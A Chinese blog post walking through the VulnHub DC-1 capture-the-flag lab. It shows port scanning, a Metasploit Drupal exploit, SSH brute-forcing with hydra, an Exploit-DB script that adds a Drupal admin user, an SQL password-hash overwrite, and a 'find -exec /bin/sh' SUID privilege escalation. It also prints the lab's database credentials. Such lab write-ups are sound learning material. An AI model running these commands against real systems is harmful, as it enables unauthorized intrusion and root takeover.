渗透测试学习(一)

vulnhub-CD1
这是初级,非常适合菜鸡

下载后虚拟机打开,选择桥接模式
在这里插入图片描述
要登录

信息收集

因为处于同一网段
arp-scan,扫内网网段的神器
首先查看自己windows的ip

在这里插入图片描述
扫到一个ip
nmap 扫端口

nmap -sS T4 -A -p- -v 10.219.65.42

4级速度扫描端口,做一次全面扫描

在这里插入图片描述
开放四个端口 22,111,80,34374
在这里插入图片描述

漏洞利用

访问网站
Drupal 框架写的站点
看到大多数提权都是用MSF进行攻击的
kali启动,记得kali也要开启桥接模式
在这里插入图片描述
用2018年的漏洞进行攻击

在这里插入图片描述
getshell后,查看flag1.txt
在这里插入图片描述

找一个配置文件
在这里插入图片描述
sites/default/settings.php
在这里插入图片描述
flag3 应该就是要登录那个网站了
先放一放

看到之前要登录,爆破ssh
/etc/passwd

在这里插入图片描述
有个flag4用户
使用九头蛇和john的字典进行爆破

在这里插入图片描述
成功登录
在这里插入图片描述

在这里插入图片描述
然后找flag3,登录数据库
数据库用户:dbuser
数据库密码:R0ck3t

得知数据库用户密码

在这里插入图片描述
应该要求我们添加用户
在这里插入图片描述
而这里说了暴力破解不是唯一的办法
这里看到cms框架是Drupal 7

搜到一个数据库漏洞
https://blog.csdn.net/weixin_46236101/article/details/108664182
https://www.freebuf.com/vuls/47271.html

这是一个cve
搜到exp由于数据库密码是经过加密,sql注入也没用
https://zhuanlan.zhihu.com/p/29829594
在这里插入图片描述
在这里插入图片描述
数据库已写入
可是也不知道为啥登不进去,密码是不是错了,感觉这exp就是抄的,密码也不对
利用searchsploit查找漏洞

searchsploit Drupal

在这里插入图片描述
整这个

在这里插入图片描述
exp位置
在这里插入图片描述

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://10.219.65.42/user -u penson233 -p penson

登录进去
在这里插入图片描述
补充:
这里还看到Drupal 7有个重置密码的php文件
重置密码
在这里插入图片描述
生成hash值,再进到数据库里

update users set pass='hash值' where name='admin';

提权

这个要求我们提权
在这里插入图片描述
这里说用-exec来进行提权
SUID提权详解

这边是记录下提权,大家看到上面的详解就可以了,我也不懂什么意思

查找所有的SUID文件

#以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

find命令

在这里插入图片描述
用这个命令来进行提权

/usr/bin/find flag4 -exec /bin/sh \;

在这里插入图片描述
得到一个bash命令行,此时我们已经是root权限
进到root目录下
在这里插入图片描述
初学渗透,望再接再厉

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值